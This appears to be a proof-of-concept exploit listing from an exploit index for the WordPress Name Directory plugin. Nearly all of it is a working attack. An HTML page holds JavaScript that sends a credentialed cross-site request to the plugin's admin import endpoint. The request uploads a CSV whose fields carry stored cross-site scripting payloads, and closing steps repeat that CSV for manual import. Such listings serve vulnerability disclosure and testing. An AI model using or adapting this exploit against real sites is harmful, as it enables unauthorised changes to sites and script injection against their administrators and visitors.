Share
## https://sploitus.com/exploit?id=WPEX-ID:D3653976-9E0A-4F2B-87F7-26B5E7A74B9D
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/example.com\/wp-admin\/admin.php?page=name-directory&sub=import&dir=11", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------10045333971882101442027278436");
        xhr.withCredentials = true;
        var body = "-----------------------------10045333971882101442027278436\r\n" + 
          "Content-Disposition: form-data; name=\"import\"; filename=\"name-directory-import-example.csv\"\r\n" + 
          "Content-Type: text/csv\r\n" + 
          "\r\n" + 
          "\"name\",\"description\",\"submitter\"\n" + 
          "\'\"\x3e\x3cscript\x3ealert(/XSS-name/)\x3c/script\x3e\',\'\"\x3e\x3cscript\x3ealert(/XSS-desc/)\x3c/script\x3e\',\'\"\x3e\x3cscript\x3ealert(/XSS-sub/)\x3c/script\x3e\'\n" + 
          "\r\n" + 
          "-----------------------------10045333971882101442027278436\r\n" + 
          "Content-Disposition: form-data; name=\"action\"\r\n" + 
          "\r\n" + 
          "save\r\n" + 
          "-----------------------------10045333971882101442027278436\r\n" + 
          "Content-Disposition: form-data; name=\"max_file_size\"\r\n" + 
          "\r\n" + 
          "16777216\r\n" + 
          "-----------------------------10045333971882101442027278436\r\n" + 
          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
          "\r\n" + 
          "Upload file and import\r\n" + 
          "-----------------------------10045333971882101442027278436--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>


As admin, Import the following CSV

"name","description","submitter"
'"><script>alert(/XSS-name/)</script>','"><script>alert(/XSS-desc/)</script>','"><script>alert(/XSS-sub/)</script>'